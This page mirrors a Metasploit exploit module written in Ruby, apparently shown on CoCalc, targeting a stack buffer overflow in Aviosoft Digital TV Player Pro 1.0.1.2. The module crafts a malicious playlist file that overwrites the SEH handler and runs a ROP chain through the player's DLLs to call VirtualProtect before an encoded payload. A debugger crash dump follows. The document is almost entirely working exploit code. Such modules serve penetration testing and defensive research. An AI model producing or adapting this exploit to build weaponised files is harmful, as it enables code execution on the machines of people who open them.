CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",

14
      'Description'    => %q{

15
            This module exploits a vulnerability found in Aviosoft Digital TV Player

16
          Pro version 1.x.  An overflow occurs when the process copies the content of a

17
          playlist file on to the stack, which may result arbitrary code execution under

18
          the context of the user.

19
        },

20
      'License'        => MSF_LICENSE,

21
      'Author'         =>

22
        [

23
          'modpr0be',  #Initial discovery, poc

24
          'sinn3r',    #Metasploit

25
        ],

26
      'References'     =>

27
        [

28
          ['OSVDB', '77043'],

29
          ['EDB', '18096'],

30
        ],

31
      'Payload'        =>

32
        {

33
          'BadChars' => "\x00\x0a\x1a",

34
          'StackAdjustment' => -3500,

35
        },

36
      'DefaultOptions'  =>

37
        {

38
          'EXITFUNC' => "seh",

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [

44
            'Aviosoft DTV Player 1.0.1.2',

45
            {

46
              'Ret'    => 0x6130534a,  #Stack pivot (ADD ESP,800; RET)

47
              'Offset' => 612,         #Offset to SEH

48
              'Max'    => 5000         #Max buffer size

49
            }

50
          ],

51
        ],

52
      'Privileged'     => false,

53
      'DisclosureDate' => '2011-11-09',

54
      'DefaultTarget'  => 0))

55


56
      register_options(

57
        [

58
          OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])

59
        ])

60
  end

61


62
  def junk(n=1)

63
    return [rand_text_alpha(4).unpack("L")[0]] * n

64
  end

65


66
  def nops(rop=false, n=1)

67
    return rop ? [0x61326003] * n : [0x90909090] * n

68
  end

69


70
  def exploit

71
    rop = [

72
      nops(true, 10),  #ROP NOP

73
      0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)

74
      0x10011108,      #ptr to &VirtualProtect

75
      0x64010503,      #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)

76
      junk,

77
      0x6160949f,      #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)

78
      junk(3),

79
      0x61604218,      #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)

80
      junk(3),

81
      0x6403d1a6,      #POP EBP # RETN (MediaPlayerCtrl.dll)

82
      junk(3),

83
      0x60333560,      #& push esp #  ret 0c (Configuration.dll)

84
      0x61323EA8,      #POP EAX # RETN (DTVDeviceManager.dll)

85
      0xA13977DF,      #0x00000343-> ebx

86
      0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

87
      0x6163d37b,      #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)

88
      0x61626807,      #XOR EAX,EAX # RETN (EPG.dll)

89
      0x640203fc,      #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

90
      0x6405347a,      #POP EDX # RETN (MediaPlayerCtrl.dll)

91
      0xA13974DC,      #0x00000040-> edx

92
      0x613107fb,      #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)

93
      0x60326803,      #POP ECX # RETN (Configuration.dll)

94
      0x60350340,      #&Writable location

95
      0x61329e07,      #POP EDI # RETN (DTVDeviceManager.dll)

96
      nops(true),      #ROP NOP

97
      0x60340178,      #POP EAX # RETN

98
      nops,            #Regular NOPs

99
      0x60322e02       #PUSH # RETN

100
    ].flatten.pack("V*")

101


102
    buf  = ''

103
    buf << rand_text_alpha(target['Offset']-buf.length)

104
    buf << [target.ret].pack('V*')

105
    buf << rand_text_alpha(136)

106
    buf << rop

107
    buf << make_nops(32)

108
    buf << payload.encoded

109
    buf << rand_text_alpha(target['Max']-buf.length)

110


111
    file_create(buf)

112
  end

113
end

114


115
=begin

116
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000

117
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc

118
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

119
MediaPlayerCtrl!DllCreateObject+0x220:

120
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

121
0:000> !exchain

122
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll

123
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -

124
DTVDeviceManager+534a (6130534a)

125
Invalid exception stack at 41414141

126
0:000> !address edi

127
    00130000 : 00130000 - 00003000

128
                    Type     00040000 MEM_MAPPED

129
                    Protect  00000002 PAGE_READONLY

130
                    State    00001000 MEM_COMMIT

131
                    Usage    RegionUsageIsVAD

132
0:000> !address esi

133
    047a0000 : 047a0000 - 0000b000

134
                    Type     00020000 MEM_PRIVATE

135
                    Protect  00000004 PAGE_READWRITE

136
                    State    00001000 MEM_COMMIT

137
                    Usage    RegionUsageHeap

138
                    Handle   013c0000

139
=end

140


141